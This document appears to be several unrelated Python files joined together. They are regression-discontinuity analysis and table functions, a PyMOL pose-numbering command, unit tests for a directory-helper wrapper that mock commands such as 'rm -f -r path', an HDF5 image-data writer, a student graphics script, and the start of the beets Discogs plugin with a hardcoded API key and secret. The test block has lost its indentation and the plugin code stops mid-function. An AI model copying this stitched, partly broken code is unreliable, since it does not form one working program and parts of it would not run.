    ax = plt.scatter(pos_loc, att_mean_loc[:,0],s = att_numobs_loc[:,0], facecolors='none', edgecolors='black')
    plt.ylim(0.4,1)
    plt.axvline(x=7, color='r')
    # plot the locally fitted linear regression line:
    plt.plot(pos_loc[3:10,0], m_left*pos_loc[3:10,0]+b_left,color="b")
    plt.plot(pos_loc[10:18,0], m_right*pos_loc[10:18,0]+b_right, color="b")
    # plot the locally fitted cubic regression line:
    plt.plot(pos_loc[:10,0], m1_left2*pos_loc[:10,0] + m2_left2*((pos_loc)**2)[:10,0]+ m3_left2*((pos_loc)**3)[:10,0] +b_left2, color="grey")
    plt.plot(pos_loc[10:,0], m1_right2*pos_loc[10:,0] + m2_right2*((pos_loc)**2)[10:,0]+m3_right2*((pos_loc)**3)[10:,0] +b_right2, color="grey")
    plt.xlabel('1st-year GPA')
    plt.ylabel('Attendance rate')
    plt.subplot(122)
    plt.title(f"Grades in {coursetype} courses")
    ax = plt.scatter(pos_loc, std_mean_loc[:,0],s = std_numobs_loc[:,0], facecolors='none', edgecolors='black')
    plt.ylim(-0.5,0.5)
    plt.axvline(x=7, color='r')
    # plot the locally fitted linear regression line:
    plt.plot(pos_loc[3:10,0], m_left1*pos_loc[3:10,0]+b_left1,color="b")
    plt.plot(pos_loc[10:18,0], m_right1*pos_loc[10:18,0]+b_right1, color="b")
    # plot the locally fitted cubic regression line:
    plt.plot(pos_loc[:10,0], m1_left22*pos_loc[:10,0] + m2_left22*((pos_loc)**2)[:10,0]+ m3_left22*((pos_loc)**3)[:10,0] +b_left22, color="grey")
    plt.plot(pos_loc[10:,0], m1_right22*pos_loc[10:,0] + m2_right22*((pos_loc)**2)[10:,0]+ m3_right22*((pos_loc)**3)[10:,0] +b_right22, color="grey")
    plt.xlabel('1st-year GPA')
    plt.ylabel('Grades (standardized)')
    plt.plot()
def get_interactionterms(df_input):
    """Add RD interaction columns to *df_input* in place and return it.

    Adds the running variable (pol1), its treatment interaction (pol1t),
    voluntary/forced course dummies, and every treatment-x-policy and
    slope-x-policy interaction.  The input frame is mutated (no copy).
    """
    df = df_input
    ### treatment interaction term:
    df["pol1"] = df["firstyeargpa"] - 7       # running variable around cutoff
    df["pol1t"] = df["pol1"] * df["treat"]    # slope interaction
    ### Coursetype indicator:
    df["volcourse"] = (df["coursepolicy"] == "voluntary").astype(int)
    df["forcourse"] = (df["coursepolicy"] == "forced").astype(int)
    ### Interaction terms: treatment x coursetype
    df["treatmentvol"] = df["treat"] * df["volcourse"]
    df["treatmentfor"] = df["treat"] * df["forcourse"]
    df["pol1vol"] = df["pol1"] * df["volcourse"]
    df["pol1for"] = df["pol1"] * df["forcourse"]
    df["pol1tvol"] = df["pol1t"] * df["volcourse"]
    df["pol1tfor"] = df["pol1t"] * df["forcourse"]
    return df
def get_kweights(df_input,bandwidth):
    """Attach triangular-kernel weights around the GPA cutoff of 7 (in place).

    kwgt = 1 - |gpa - 7| / bandwidth; weights fall linearly to 0 at the
    bandwidth edge (and go negative outside it).  Returns the mutated frame.
    """
    df = df_input
    distance = (df["firstyeargpa"] - 7).abs() / bandwidth
    df["kwgt"] = 1 - distance
    return df
def get_table3(df):
    """Estimate and tabulate effects on standardized grades (Table 3).

    Runs two kernel-weighted (column 'kwgt') OLS regressions with
    student-clustered standard errors -- a pooled RD specification and one
    with course-policy interactions -- and returns a Stargazer table showing
    the treatment coefficients.
    """
    ### regressions:
    rslt = smf.ols(formula="stdgrade ~ treat + pol1+ pol1t", data=df, weights=df["kwgt"]).fit(cov_type='cluster',cov_kwds={'groups': df["studentid"]})
    rslt1 = rslt
    formula2 = "stdgrade ~ treat + treatmentvol + treatmentfor + volcourse + forcourse + pol1 + pol1t + pol1vol + pol1tvol + pol1for + pol1tfor"
    rslt = smf.ols(formula=formula2, data=df,weights=df["kwgt"] ).fit(cov_type='cluster',cov_kwds={'groups': df["studentid"]})
    rslt2 = rslt
    ### Table stargazer:
    stargazer = Stargazer([rslt1,rslt2])
    # column labels mirror the paper's table layout
    stargazer.custom_columns(["column 1","column 4" ], [1,1])
    stargazer.title("Table 3 - Effects on standardized grades")
    stargazer.show_model_numbers(False)
    stargazer.significant_digits(2)
    stargazer.covariate_order([ "treat","treatmentvol","treatmentfor"])
    stargazer.rename_covariates({"treat": "1st-year GPA is below 7",
                                 "treatmentvol":"Attendance is voluntary x treatment",
                                 "treatmentfor":"Absence is penalized x treatment"})
    stargazer.show_degrees_of_freedom(False)
    stargazer.add_line('Fixed Effects', ['No', 'No'])
    return stargazer
def get_table4(rslt,coursetype):
    """Print the treatment-effect summary (Table 4) for one course type.

    *rslt* is a (3, 4) array with one row [effect, std. error, p-value, N]
    per outcome: attendance rate, standardized grade, course passing.
    """
    rslt = np.round(rslt,3)
    outcomes = ["Attendance rate", "Grade (standardized)", "Passes course"]
    info = [["Variable","Treatment Effect","Stand. Error","p-value","Observations"]]
    for idx, (label, row) in enumerate(zip(outcomes, rslt)):
        if idx:
            info.append(["","","","",""])  # blank separator between sections
        info.append([label,"","","",""])
        info.append(["1st-year GPA below 7", row[0], row[1], row[2], row[3]])
    print(f"Table 4 - {coursetype} course type")
    print(tabulate(info ,headers='firstrow',tablefmt='fancy_grid'))
def get_table5(df_c15, df_c6):
    """Print the difference-in-differences grade comparison (Table 5).

    Compares mean second-year grades just below ([6.9, 7.0)) and just above
    ([7.0, 7.1]) the cutoff, within the pre-abolition cohorts (*df_c15*) and
    the abolition cohort (*df_c6*), plus between-cohort differences, with
    two-sample t-test p-values throughout.
    """
    # cell means and counts; the 6.9999 upper bound keeps 7.0 out of the
    # below-cutoff cell
    av11 = round(df_c15["grade"].loc[df_c15["firstyeargpa"].between(6.9,6.9999)].mean(),3)
    av12 = round(df_c15["grade"].loc[df_c15["firstyeargpa"].between(7,7.1)].mean(),3)
    n11 = len(df_c15["grade"].loc[df_c15["firstyeargpa"].between(6.9,6.9999)])
    n12 = len(df_c15["grade"].loc[df_c15["firstyeargpa"].between(7,7.1)])
    av21 = round(df_c6["grade"].loc[df_c6["firstyeargpa"].between(6.9,6.9999)].mean(),3)
    av22 = round(df_c6["grade"].loc[df_c6["firstyeargpa"].between(7,7.1)].mean(),3)
    n21 = len(df_c6["grade"].loc[df_c6["firstyeargpa"].between(6.9,6.9999)])
    n22 = len(df_c6["grade"].loc[df_c6["firstyeargpa"].between(7,7.1)])
    # (1.) difference within cohort 1-5:
    treated = df_c15["grade"].loc[df_c15["firstyeargpa"].between(6.9,6.9999)]
    control = df_c15["grade"].loc[df_c15["firstyeargpa"].between(7,7.1)]
    diff_stat1 = round(ttest_ind(treated,control)[1],3)
    # (2.) difference within cohort 6:
    treated = df_c6["grade"].loc[df_c6["firstyeargpa"].between(6.9,6.9999)]
    control = df_c6["grade"].loc[df_c6["firstyeargpa"].between(7,7.1)]
    diff_stat2 = round(ttest_ind(treated,control)[1],3)
    # (3.) difference between cohorts below 7:
    treated = df_c15["grade"].loc[df_c15["firstyeargpa"].between(6.9,6.9999)]
    control = df_c6["grade"].loc[df_c6["firstyeargpa"].between(6.9,6.9999)]
    diff_stat3 = round(ttest_ind(treated,control)[1],3)
    # (4.) difference between cohorts above 7:
    treated = df_c15["grade"].loc[df_c15["firstyeargpa"].between(7,7.1)]
    control = df_c6["grade"].loc[df_c6["firstyeargpa"].between(7,7.1)]
    diff_stat4 = round(ttest_ind(treated,control)[1],3)
    # Create a table:
    info = [["Cohort | First-year GPA:","[6.9,7.0]","[7.0,7.1]","Difference","p-value"], ["2009-2013","","","",""]
            ,["Second-year Grade Average",av11,av12,round(av12-av11,3),diff_stat1]
            ,["Observations",n11,n12,"",""]
            ,["","","","","",""]
            ,["2014","","","",""]
            ,["Second-year Grade Average",av21,av22,round(av22-av21,3),diff_stat2]
            ,["Observations",n21,n22,"",""]
            ,["","","","","",""]
            ,["Difference between cohorts",round(av21-av11,3),round(av22-av12,3),"" ,"" ]
            , ["p-value",diff_stat3,diff_stat4,"",""]]
    print(tabulate(info ,headers='firstrow',tablefmt='fancy_grid'))
def get_table_spec1(df,coursetype,rslt_rdrobust):
    """Print locally linear RD estimates next to rdrobust results.

    Runs kernel-weighted (bandwidth 0.365), student-clustered OLS for the
    three outcomes (attendance, standardized grade, course passing) and
    tabulates each coefficient/p-value beside the corresponding row of
    *rslt_rdrobust* (expected shape (3, >=3): [effect, ?, p-value]).
    """
    df1 = get_truncated_data(df,0.365,1,coursetype)
    df11 = get_interactionterms(df1)
    df_reg = get_kweights(df11,0.365)
    # params[1]/pvalues[1] pick the treatment coefficient (intercept is [0])
    rslt = smf.ols(formula="attendance ~ treat + firstyeargpa_centered + pol1t", data=df_reg, weights=df_reg["kwgt"]).fit(cov_type='cluster',cov_kwds={'groups': df_reg["studentid"]})
    rslt_att_b = rslt.params[1]
    rslt_att_p = rslt.pvalues[1]
    rslt = smf.ols(formula="stdgrade ~ treat + firstyeargpa_centered + pol1t", data=df_reg, weights=df_reg["kwgt"]).fit(cov_type='cluster',cov_kwds={'groups': df_reg["studentid"]})
    rslt_grade_b = rslt.params[1]
    rslt_grade_p = rslt.pvalues[1]
    rslt = smf.ols(formula="passcourse ~ treat + firstyeargpa_centered + pol1t", data=df_reg, weights=df_reg["kwgt"]).fit(cov_type='cluster',cov_kwds={'groups': df_reg["studentid"]})
    rslt_pass_b = rslt.params[1]
    rslt_pass_p = rslt.pvalues[1]
    rslt_att_b = np.round(rslt_att_b,3)
    rslt_att_p = np.round(rslt_att_p,3)
    rslt_grade_b = np.round(rslt_grade_b,3)
    rslt_grade_p = np.round(rslt_grade_p,3)
    rslt_pass_b = np.round(rslt_pass_b,3)
    rslt_pass_p = np.round(rslt_pass_p,3)
    rslt_r = np.round(rslt_rdrobust,3)
    info = [["Variable","Treatment Effect","p-value","Treatment Effect (rdrobust)","p-value"]
            ,["Attendance Rate",rslt_att_b,rslt_att_p,rslt_r[0,0],rslt_r[0,2]]
            ,["Standardized Grades",rslt_grade_b,rslt_grade_p,rslt_r[1,0],rslt_r[1,2]]
            ,["Passes Course",rslt_pass_b,rslt_pass_p,rslt_r[2,0],rslt_r[2,2]]
            ]
    print(tabulate(info ,headers='firstrow',tablefmt='fancy_grid'))
def get_table_spec2(df,coursetype):
    """Robustness check: RD effect on grades under polynomial orders 1-3.

    Refits the kernel-weighted (bandwidth 0.365), student-clustered RD
    regression of standardized grades with locally linear, quadratic and
    cubic running-variable terms (each interacted with treatment), and
    prints the treatment coefficient and p-value per specification.
    """
    ### get data
    df_temp = get_truncated_data(df,0.365,1,coursetype)
    df_temp1 = get_interactionterms(df_temp)
    df_reg = get_kweights(df_temp1,0.365)
    ### create polynomials (and their treatment interactions)
    df_reg["X2"] = df_reg["firstyeargpa_centered"]**2
    df_reg["X3"] = df_reg["firstyeargpa_centered"]**3
    df_reg["pol1t2"] = df_reg["X2"]*df_reg["treat"]
    df_reg["pol1t3"] = df_reg["X3"]*df_reg["treat"]
    ### linear regression
    # params[1]/pvalues[1] pick the treatment coefficient
    rslt = smf.ols(formula="stdgrade ~ treat + firstyeargpa_centered + pol1t", data=df_reg, weights=df_reg["kwgt"]).fit(cov_type='cluster',cov_kwds={'groups': df_reg["studentid"]})
    rslt_b = rslt.params[1]
    rslt_p = rslt.pvalues[1]
    ### quadratic regression
    rslt2 = smf.ols(formula="stdgrade ~ treat + firstyeargpa_centered + X2 + pol1t + pol1t2", data=df_reg, weights=df_reg["kwgt"]).fit(cov_type='cluster',cov_kwds={'groups': df_reg["studentid"]})
    rslt2_b = rslt2.params[1]
    rslt2_p = rslt2.pvalues[1]
    ### cubic regression
    rslt3 = smf.ols(formula="stdgrade ~ treat + firstyeargpa_centered + X2 + X3 + pol1t + pol1t2 + pol1t3", data=df_reg, weights=df_reg["kwgt"]).fit(cov_type='cluster',cov_kwds={'groups': df_reg["studentid"]})
    rslt3_b = rslt3.params[1]
    rslt3_p = rslt3.pvalues[1]
    ### Table
    info = [["Order of Polynomial","Treatment Effect","p-value"]
            ,["Locally Linear",rslt_b,rslt_p]
            ,["Locally Quadratic",rslt2_b,rslt2_p]
            ,["Locally Cubic",rslt3_b,rslt3_p]
            ]
    print(tabulate(info ,headers='firstrow',tablefmt='fancy_grid'))
def get_fakecutoff(df,coursetype,y_var):
    """Placebo test: estimate the RD effect of *y_var* at fake cutoffs.

    For each fake cutoff c in {6, 8, 8.25, 9}: center the running variable at
    c, build a fake treatment dummy, apply triangular kernel weights inside a
    0.365 bandwidth (0 outside), and run the locally linear RD regression
    with student-clustered standard errors.

    Returns a (4, 3) array of rows [cutoff, treatment effect, p-value].

    BUG FIX: the kernel weights were computed from the untruncated `df`,
    whose row index no longer lines up with `df_reg` after the reset_index
    inside get_truncated_data, so misaligned weights were silently assigned;
    the weights now come from df_reg's own GPA column.
    """
    rslt_temp = np.zeros((4,3))
    for i,c in enumerate([6,8,8.25,9]):
        ### data: pre-abolition cohorts, full GPA range, one course type
        df_reg = get_truncated_data(df,"total range",1,coursetype)
        ### create running variable centered at fake cutoff and fake treatment variables
        df_reg["X_fake"] = -1*(df_reg["firstyeargpa"] - c)
        df_reg["treat_fake"] = 0
        df_reg.loc[df_reg["firstyeargpa"] < c, ["treat_fake"]] = 1
        df_reg["treat_X_fake"] = df_reg["treat_fake"] * df_reg["X_fake"]
        df_reg["kwgt_fake"] = 0
        df_reg.loc[abs(df_reg["X_fake"]) <= 0.365, ["kwgt_fake"]] = (
            1 - abs((df_reg["firstyeargpa"] - c) / 0.365))  # was df[...] (misaligned)
        ### locally linear regression; [1] is the treatment coefficient
        formula = y_var + " ~ treat_fake + X_fake + treat_X_fake"
        rslt = smf.ols(formula=formula, data=df_reg, weights=df_reg["kwgt_fake"]).fit(cov_type='cluster',cov_kwds={'groups': df_reg["studentid"]})
        ### save results
        rslt_temp[i,0] = c
        rslt_temp[i,1] = rslt.params[1]
        rslt_temp[i,2] = rslt.pvalues[1]
    return rslt_temp
def get_table_fakecutoff(rslt_input):
    """Print the placebo-cutoff table: one row per fake cutoff.

    *rslt_input* rows are [cutoff, treatment effect, p-value], as produced
    by get_fakecutoff.  Generalized: renders however many rows the input
    has (the original hard-coded exactly four).
    """
    rslt_bw = np.round(rslt_input,3)
    info = [["Fake Cutoff at","Treatment Effect","p-value"]]
    for row in rslt_bw:
        info.append([row[0], row[1], row[2]])
    print(tabulate(info ,headers='firstrow',tablefmt='fancy_grid'))
def get_bandwidth_results(df,coursetype,y_var):
    """Re-estimate the locally linear RD effect of *y_var* across bandwidths.

    For each bandwidth h in {0.5, 0.4, 0.365, 0.3, 0.2, 0.1}: truncate to the
    pre-abolition cohorts within h of the cutoff, rebuild interaction terms
    and triangular kernel weights, and fit the student-clustered weighted
    regression.  Returns a (6, 3) array of rows [h, effect, p-value].
    """
    bandwidths = [0.5, 0.4, 0.365, 0.3, 0.2, 0.1]
    results = np.zeros((6,3))
    formula = y_var + " ~ treat + firstyeargpa_centered + pol1t"
    for row, h in enumerate(bandwidths):
        ### data within bandwidth, with interactions and kernel weights:
        sample = get_kweights(get_interactionterms(get_truncated_data(df, h, 1, coursetype)), h)
        ### locally linear regression; [1] is the treatment coefficient
        fit = smf.ols(formula=formula, data=sample, weights=sample["kwgt"]).fit(cov_type='cluster',cov_kwds={'groups': sample["studentid"]})
        results[row, 0] = h
        results[row, 1] = fit.params[1]
        results[row, 2] = fit.pvalues[1]
    return results
def get_table_spec4(rslt_input):
    """Print the bandwidth-robustness table: one row per bandwidth.

    *rslt_input* rows are [bandwidth, treatment effect, p-value], as produced
    by get_bandwidth_results.  Generalized: renders however many rows the
    input has (the original hard-coded exactly six).
    """
    rslt_bw = np.round(rslt_input,3)
    info = [["Bandwidth","Treatment Effect","p-value"]]
    for row in rslt_bw:
        info.append([row[0], row[1], row[2]])
    print(tabulate(info ,headers='firstrow',tablefmt='fancy_grid'))
#This function will return the Rosetta pose number for residues in a selection, if the object were saved to a PDB file.
#This will be determined based on the object that contains the selection.
#When determining pose numbering, residues with only hydrogens will be ignored, as will HOH or WAT.
#Strange multiple states, residue ordering, segis, and chains could result in unusual behaviour.
from pymol import cmd
def pdb2pose(poseres):
    """
DESCRIPTION
    The "pdb2pose" command returns the Rosetta-style pose number of a selection of residues.
USAGE
    pdb2pose poseres
ARGUMENTS
    poseres = string: selection with the residues to process.
NOTES
    A selection that spans multiple objects is unsupported, and will produce an error.
    The pose numbering returned will be for the current version of the object. Adding, removing, re-ordering, or sorting residues will alter the pose number.
    Multi-state selections may yield unexpected results.
    If the selection has different chain IDs and segids, this may also result in unexpected chain ordering.
    Residues containing only hydrogen atoms and water molecules will be ignored.
    """
    # Determine what object contains the selection.
    poseobj = cmd.get_object_list(poseres)
    # Pose numbering is ambiguous across objects, so require exactly one.
    assert (len(poseobj) == 1), "Your selection spans multiple objects (or no objects). Select one object only."
    # Record each selected residue once, keyed as "<resi><chain>" (e.g. "35A").
    selemodel = cmd.get_model(poseres)
    selected_residues = set()
    for curatom in selemodel.atom:
        selected_residues.add(str(curatom.resi) + curatom.chain)
    # Collect (chain, resi) for every heavy, non-water atom of the object, in
    # atom order. BUGFIX: the original code wrote into `stored.*`, but `stored`
    # was never imported (only `cmd` is), so this raised a NameError; passing a
    # `space` dict to cmd.iterate keeps the lists local instead.
    atomdata = {'chains': [], 'resis': []}
    cmd.iterate(poseobj[0] + ' and not elem H and not resn HOH and not resn WAT',
                'chains.append(chain); resis.append(resi)', space=atomdata)
    # Walk the atoms in order; each newly-encountered (chain, resi) pair gets
    # the next pose number. Report the number for every selected residue.
    curchain = ''
    curresi = ''
    posenum = 0
    for chain, resi in zip(atomdata['chains'], atomdata['resis']):
        if (chain != curchain or resi != curresi):
            curchain = chain
            curresi = resi
            posenum = posenum + 1
            if (str(curresi) + curchain in selected_residues):
                print("The pose number for residue " + str(curresi) + curchain + " is " + str(posenum) + ".\n")
# Register pdb2pose so it can be invoked from the PyMOL command line.
cmd.extend('pdb2pose', pdb2pose)
# Configure the first argument to tab-complete as a selection name.
cmd.auto_arg[0]['pdb2pose'] = [ cmd.selection_sc, 'selection', ' ' ]
# -*- coding: utf-8 -*-
from __future__ import absolute_import, division, with_statement
from fudge import patch
import cuisine
from revolver import directory
from .utils import run_result
def test_revolver_is_just_a_wrapper():
    """revolver.directory functions are plain aliases of cuisine helpers."""
    assert directory.attributes == cuisine.dir_attribs
    assert directory.attributes_get == cuisine.file_attribs_get
    assert directory.ensure == cuisine.dir_ensure
    assert directory.exists == cuisine.dir_exists
    assert directory.is_link == cuisine.file_is_link
@patch("revolver.directory.mkdtemp")
def test_temp_local(mkdtemp):
mkdtemp.expects_call().returns(run_result("path"))
assert directory.temp_local() == "path"
@patch("revolver.core.run")
@patch("revolver.directory.attributes")
def test_temp_calles_mktemp(run, attributes):
(run.expects_call()
.with_args("mktemp --directory")
.returns(run_result("foo")))
attributes.expects_call()
assert directory.temp() == "foo"
@patch("revolver.core.run")
@patch("revolver.directory.attributes")
def test_temp_default_attributes(run, attributes):
run.expects_call().returns(run_result("path"))
(attributes.expects_call()
.with_args("path", mode=None, owner=None, group=None))
directory.temp()
@patch("revolver.core.run")
@patch("revolver.directory.attributes")
def test_temp_passes_attributes(run, attributes):
run.expects_call().returns(run_result("path"))
(attributes.expects_call()
.with_args("path", mode="foo", owner="bar", group="baz"))
directory.temp("foo", "bar", "baz")
@patch("revolver.core.run")
def test_remove_defaults(run):
run.expects_call().with_args("rm -f path")
directory.remove("path")
@patch("revolver.core.run")
def test_remove_recusrive(run):
run.expects_call().with_args("rm -f path")
directory.remove("path", recursive=False)
run.expects_call().with_args("rm -f -r path")
directory.remove("path", recursive=True)
@patch("revolver.core.run")
def test_remove_force(run):
run.expects_call().with_args("rm path")
directory.remove("path", force=False)
run.expects_call().with_args("rm -f path")
directory.remove("path", force=True)
@patch("revolver.core.run")
@patch("revolver.directory.exists")
def test_create_if_path_exists(run, exists):
exists.expects_call().with_args("path").returns(True)
directory.create("path")
@patch("revolver.core.run")
@patch("revolver.directory.exists")
def test_create_defaults(run, exists):
exists.expects_call().with_args("path").returns(False)
run.expects_call().with_args("mkdir path")
directory.create("path")
@patch("revolver.core.run")
@patch("revolver.directory.exists")
def test_create_recursive(run, exists):
exists.expects_call().returns(False)
run.expects_call().with_args("mkdir -p path")
directory.create("path", recursive=True)
@patch("revolver.core.run")
@patch("revolver.directory.exists")
@patch("revolver.directory.attributes")
def test_create_default_attributes(run, exists, attributes):
run.expects_call().with_args("mkdir path")
exists.expects_call().returns(False)
(attributes.expects_call()
.with_args("path", mode=None, owner=None, group=None))
directory.create("path")
@patch("revolver.core.run")
@patch("revolver.directory.exists")
@patch("revolver.directory.attributes")
def test_create_passes_attributes(run, exists, attributes):
run.expects_call().with_args("mkdir path")
exists.expects_call().returns(False)
(attributes.expects_call()
.with_args("path", mode="foo", owner="bar", group="baz"))
directory.create("path", mode="foo", owner="bar", group="baz")
|
import os
import numpy as np
import tables
from scipy.ndimage import zoom
from fetal_net.utils.utils import read_img, transpose_if_needed
from .normalize import normalize_data_storage, normalize_data_storage_each, normalize_data_storage_each_clip_and_norm, \
normalize_data_storage_each_just_stretch, normalize_data_storage_each_stretch_and_norm, \
normalize_data_storage_each_minmax, normalize_data_storage_each_just_clip, new_clip_and_stretch_each
def create_data_file(out_file, add_pred, n_samples):
    """Create an HDF5 file with VLArrays for 'data', 'truth' and optionally 'pred'.

    Returns (hdf5_file, data_storage, truth_storage, pred_storage); the last
    element is None when `add_pred` is None.
    """
    hdf5_file = tables.open_file(out_file, mode='w')
    compression = tables.Filters(complevel=5, complib='blosc')

    def _make_storage(name):
        # Variable-length arrays allow subjects with differing shapes.
        return hdf5_file.create_vlarray(hdf5_file.root, name,
                                        tables.ObjectAtom(),
                                        filters=compression,
                                        expectedrows=n_samples)

    data_storage = _make_storage('data')
    truth_storage = _make_storage('truth')
    pred_storage = _make_storage('pred') if add_pred is not None else None
    return hdf5_file, data_storage, truth_storage, pred_storage
def bounding_box_naive(truth_img):
    """Return the padded bounding box of voxels labeled 1.

    Result is [(x_lo, x_hi), (y_lo, y_hi), (z_lo, z_hi)]: the min/max index
    along each axis, padded by 16 voxels in x/y and 2 slices in z, clamped
    to the image extent.
    """
    xs, ys, zs = np.where(truth_img == 1)
    x_bounds = (max(xs.min() - 16, 0), min(xs.max() + 16, truth_img.shape[0]))
    y_bounds = (max(ys.min() - 16, 0), min(ys.max() + 16, truth_img.shape[1]))
    z_bounds = (max(zs.min() - 2, 0), min(zs.max() + 2, truth_img.shape[-1]))
    return [x_bounds, y_bounds, z_bounds]
def write_image_data_to_file(image_files, data_storage, truth_storage, pred_storage, add_pred, truth_dtype=np.uint8):
    """Read each subject's image files and append them to the HDF5 storages.

    `image_files` is an iterable of per-subject tuples of file paths; each
    file is loaded with `read_img` and transposed via `transpose_if_needed`
    before being handed to `add_data_to_storage`. Returns the (data, truth)
    storages for convenience.
    """
    # TODO add scaling option as well
    for set_of_files in image_files:
        images = [read_img(_) for _ in set_of_files]
        # subject_data = [zoom(transpose_if_needed(image.get_data()), [0.25, 0.25, 1]) for image in images]
        subject_data = [transpose_if_needed(image.get_data()) for image in images]
        if len(subject_data) > 0:
            # Disabled experiment: cropping all modalities to the truth
            # bounding box before storage.
            #bb = bounding_box_naive(subject_data[-1])
            #for i, _ in enumerate(subject_data):
            #    print(f"Data shape before narrow: {subject_data[i].shape}")
            #    subject_data[i] = subject_data[i][bb[0][0]:bb[0][1], bb[1][0]:bb[1][1], bb[2][0]:bb[2][1]]
            #    print(f"Data shape after narrow: {subject_data[i].shape}")
            add_data_to_storage(data_storage, truth_storage, pred_storage, add_pred, subject_data, truth_dtype)
    return data_storage, truth_storage
def add_data_to_storage(data_storage, truth_storage, pred_storage, add_pred, subject_data, truth_dtype):
    """Append one subject's modalities to the storages.

    `subject_data` holds 1-3 arrays ordered [data, (pred), (truth)]; which
    trailing modalities are present is inferred from its length and
    `add_pred`. Raises ValueError for unsupported combinations.
    """
    # Can range from 1-3
    # TODO - add parameter to control which modalities are given here?
    # TODO - currently infers 2 modalities according to add_pred
    n_modalities = len(subject_data)
    print(f"n_modalities: {n_modalities}")
    data_ind = 0
    if n_modalities == 2 and add_pred:
        pred_ind, truth_ind = 1, -1
    elif n_modalities == 2 and not add_pred:
        pred_ind, truth_ind = -1, 1
    elif n_modalities == 3 and add_pred:
        pred_ind, truth_ind = 1, 2
    elif n_modalities == 1:
        pred_ind, truth_ind = -1, -1
    else:
        raise ValueError(f"Amount of modalities is {n_modalities}, add_pred is {add_pred}. What should happen?")
    # BUGFIX: `np.float` was a deprecated alias removed in NumPy 1.24; the
    # builtin `float` gives the same float64 dtype without the AttributeError.
    data_storage.append(np.asarray(subject_data[data_ind]).astype(float))
    if pred_ind > 0:
        pred_storage.append(np.asarray(subject_data[pred_ind]).astype(float))
    if truth_ind > 0:
        truth_storage.append(np.asarray(subject_data[truth_ind], dtype=truth_dtype))
def write_data_to_file(training_data_files, out_file, truth_dtype=np.uint8,
                       subject_ids=None, normalize='all', add_pred=None):
    """
    Takes in a set of training images and writes those images to an hdf5 file.
    :param training_data_files: List of tuples containing the training data files. The modalities should be listed in
    the same order in each tuple. The last item in each tuple must be the labeled image.
    Example: [('sub1-T1.nii.gz', 'sub1-T2.nii.gz', 'sub1-truth.nii.gz'),
              ('sub2-T1.nii.gz', 'sub2-T2.nii.gz', 'sub2-truth.nii.gz')]
    :param out_file: Where the hdf5 file will be written to.
    :param truth_dtype: Default is 8-bit unsigned integer.
    :param subject_ids: Optional list of subject ids stored alongside the data.
    :param normalize: Name of the normalization scheme ('all', 'each', ...);
        any non-string value skips normalization.
    :param add_pred: When not None, a 'pred' storage is created and filled.
    :return: Tuple of (out_file, (mean, std)); mean/std are None when no
        normalization was applied.
    """
    n_samples = len(training_data_files)
    try:
        hdf5_file, data_storage, truth_storage, pred_storage = create_data_file(out_file, add_pred, n_samples=n_samples)
    except Exception as e:
        # If something goes wrong, delete the incomplete data file
        os.remove(out_file)
        raise e
    write_image_data_to_file(training_data_files, data_storage, truth_storage, pred_storage, add_pred,
                             truth_dtype=truth_dtype)
    if subject_ids:
        hdf5_file.create_array(hdf5_file.root, 'subject_ids', obj=subject_ids)
    # Dispatch on the normalization scheme name; raises KeyError for an
    # unknown scheme name.
    if isinstance(normalize, str):
        _, mean, std = {
            'all': normalize_data_storage,
            'each': normalize_data_storage_each,
            'each_stretch': normalize_data_storage_each_just_stretch,
            'each_stretch_and': normalize_data_storage_each_stretch_and_norm,
            'each_clip': normalize_data_storage_each_just_clip,
            'each_clip_and': normalize_data_storage_each_clip_and_norm,
            'each_minmax': normalize_data_storage_each_minmax,
            'each_new': new_clip_and_stretch_each
        }[normalize](data_storage)
    else:
        mean, std = None, None
    hdf5_file.close()
    return out_file, (mean, std)
def open_data_file(filename, readwrite="r"):
    """Open an existing HDF5 data file (read-only by default)."""
    return tables.open_file(filename, mode=readwrite)
|
# Name: Taidgh Murray
# Student ID: 15315901
# File: archery.py
############################################################################
import graphics
win = graphics.GraphWin('Archery Target')
# Draw the concentric target rings, largest first so each smaller ring is
# painted on top of the previous one. Replaces five copy-pasted blocks with
# one data-driven loop; the drawing produced is identical.
centre = graphics.Point(100, 100)
for radius, colour in ((50, 'White'), (40, 'Black'), (30, 'Blue'),
                       (20, 'Red'), (10, 'Yellow')):
    ring = graphics.Circle(centre, radius)
    ring.setFill(colour)
    ring.draw(win)
# this waits until you have clicked in the window to close it.
win.getMouse()
win.close()
|
# This file is part of beets.
# Copyright 2016, Adrian Sampson.
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
"""Adds Discogs album search support to the autotagger. Requires the
python3-discogs-client library.
"""
import beets.ui
from beets import config
from beets.util.id_extractors import extract_discogs_id_regex
from beets.autotag.hooks import AlbumInfo, TrackInfo, string_dist
from beets.plugins import MetadataSourcePlugin, BeetsPlugin, get_distance
import confuse
from discogs_client import __version__ as dc_string
from discogs_client import Release, Master, Client
from discogs_client.exceptions import DiscogsAPIError
from requests.exceptions import ConnectionError
import http.client
import beets
import re
import time
import json
import socket
import os
import traceback
from string import ascii_lowercase
USER_AGENT = f'beets/{beets.__version__} +https://beets.io/'
API_KEY = 'rAzVUQYRaoFjeBjyWuWZ'
API_SECRET = 'plxtUTqoCzwxZpqdPysCwGuBSmZNdZVy'
# Exceptions that discogs_client should really handle but does not.
CONNECTION_ERRORS = (ConnectionError, socket.error, http.client.HTTPException,
ValueError, # JSON decoding raises a ValueError.
DiscogsAPIError)
class DiscogsPlugin(BeetsPlugin):
    def __init__(self):
        """Set config defaults, redact secrets, and defer client creation
        to `setup()` (registered on `import_begin`)."""
        super().__init__()
        self.check_discogs_client()
        self.config.add({
            'apikey': API_KEY,
            'apisecret': API_SECRET,
            'tokenfile': 'discogs_token.json',
            'source_weight': 0.5,
            'user_token': '',
            'separator': ', ',
            'index_tracks': False,
            'append_style_genre': False,
        })
        # Keep credentials out of dumped configuration output.
        self.config['apikey'].redact = True
        self.config['apisecret'].redact = True
        self.config['user_token'].redact = True
        # Populated by setup(); every API entry point checks for None first.
        self.discogs_client = None
        self.register_listener('import_begin', self.setup)
def check_discogs_client(self):
"""Ensure python3-discogs-client version >= 2.3.15
"""
dc_min_version = [2, 3, 15]
dc_version = [int(elem) for elem in dc_string.split('.')]
min_len = min(len(dc_version), len(dc_min_version))
gt_min = [(elem > elem_min) for elem, elem_min in
zip(dc_version[:min_len],
dc_min_version[:min_len])]
if True not in gt_min:
